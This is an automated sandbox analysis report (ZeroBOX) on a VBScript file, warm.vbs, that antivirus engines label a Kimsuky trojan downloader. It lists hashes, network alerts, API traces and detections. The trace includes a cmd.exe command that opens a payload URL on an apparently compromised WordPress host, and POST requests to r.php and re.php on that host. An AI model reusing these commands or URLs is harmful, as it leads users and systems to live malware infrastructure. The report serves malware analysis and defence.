Summary | ZeroBOX

warm.vbs

Antivirus
Category FILE
Machine s1_win7_x6401
Started May 17, 2024, 10:14 a.m.
Completed May 17, 2024, 10:16 a.m.
Size 27.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 75ec9f68a5b62705c115db5119a78134
SHA256 ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
CRC32 620B30B2
ssdeep 384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj
Yara
  • Antivirus - Contains references to security software

Name Response Post-Analysis Lookup
makeoversalon.net.in 5.9.123.217
IP Address Status Action
117.18.232.200 Active Moloch
164.124.101.2 Active Moloch
5.9.123.217 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49173 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49169 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49184 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49166 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49165 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49171 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49182 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 5.9.123.217:443 -> 192.168.56.101:49172 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.9.123.217:443 -> 192.168.56.101:49170 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 117.18.232.200:443 -> 192.168.56.101:49186 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 5.9.123.217:443 -> 192.168.56.101:49179 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49177 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49176 -> 5.9.123.217:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49183 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 117.18.232.200:443 -> 192.168.56.101:49187 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 117.18.232.200:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
cmdline cmd.exe /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
cmdline "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
parameters:
filepath: ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
0 0

ShellExecuteExW

show_type: 0
filepath_r: d#??L?0MGR{JY??.??}?
parameters:
filepath: d#??L?0MGR{JY??.??}?
0 0
host 117.18.232.200
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
1 13369356 0

InternetCrackUrlW

url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
1 13369356 0
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/r.php
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: wsfF¯cóW3síû¿2ag„óÿh†®*J ;ðhª¤/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1152
sent: 124
1 124 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: wsfF¯cÉðò•åšE¾V @Ê2O®zpä9yçM/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1152
sent: 124
1 124 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: 51fF¯dPÒAÇK>†JK bƒ €•á‰Â"¥¤†–~  ÿ
socket: 1152
sent: 58
1 58 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

InternetCrackUrlW

url: https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 81788928
http_method: POST
referer:
path: /wp-content/plugins/wp-custom-taxonomy-image/iiri/re.php
1 13369356 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: wsfF¯e¶%Ex`~»C–$×´‡QÿtùWŒ>á¹üe/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1264
sent: 124
1 124 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: wsfF¯eFUDjcëÇg:Á?Úa Þ4ü~tnß%}I÷5/5 ÀÀÀ À 282ÿmakeoversalon.net.in  
socket: 1264
sent: 124
1 124 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: 51fF¯f;ñsª®Ö£ãвY<aÝe*\È!QÇ4ân  ÿ
socket: 1264
sent: 58
1 58 0

send

buffer: !
socket: 1012
sent: 1
1 1 0

send

buffer: !
socket: 1012
sent: 1
1 1 0
parent_process wscript.exe martian_process cmd.exe /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
parent_process wscript.exe martian_process ??^3u 1?p??!y?M????W0?<?????r??????(?? ????Rw??b[????Z?2????<?tZ ????\???????????<€)J????i[?i?R#??,??7
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
parent_process wscript.exe martian_process d#??L?0MGR{JY??.??}?
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2772
thread_handle: 0x00000084
process_identifier: 2768
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\explorer.exe
track: 1
command_line: explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
filepath_r: C:\Windows\system32\explorer.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Lionic Trojan.Script.Kimsuky.4!c
ALYac Trojan.Script.Agent
VIPRE VB:Trojan.Kimsuky.A
Arcabit VB:Trojan.Kimsuky.A
Symantec ISB.Downloader!gen407
ESET-NOD32 VBS/Kimsuky.AM
TrendMicro-HouseCall TROJ_FRS.0NA104DU24
Avast Script:SNH-gen [Drp]
Kaspersky HEUR:Trojan.VBS.Kimsuky.gen
BitDefender VB:Trojan.Kimsuky.A
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
MicroWorld-eScan VB:Trojan.Kimsuky.A
Rising Trojan.Kimsuky/VBS!8.13D95 (TOPIS:E0:ye5CWOWNOTJ)
Emsisoft VB:Trojan.Kimsuky.A (B)
DrWeb Trojan.MulDrop27.323
TrendMicro TROJ_FRS.0NA104DU24
FireEye VB:Trojan.Kimsuky.A
Ikarus Trojan.VBS.Kimsuky
Google Detected
Kingsoft Win32.Troj.Undef.a
Microsoft Trojan:VBS/Malgent!MSR
ZoneAlarm HEUR:Trojan.VBS.Kimsuky.gen
GData VB:Trojan.Kimsuky.A
Varist ABRisk.LHNS-4
AhnLab-V3 Downloader/VBS.Agent.SC199562
Tencent Vbs.Trojan.Kimsuky.Dwnw
MAX malware (ai score=84)
Fortinet VBS/Kimusky.AM!tr
AVG Script:SNH-gen [Drp]
alibabacloud Trojan:Win/Kimsuky.AZ
file C:\Windows\System32\cmd.exe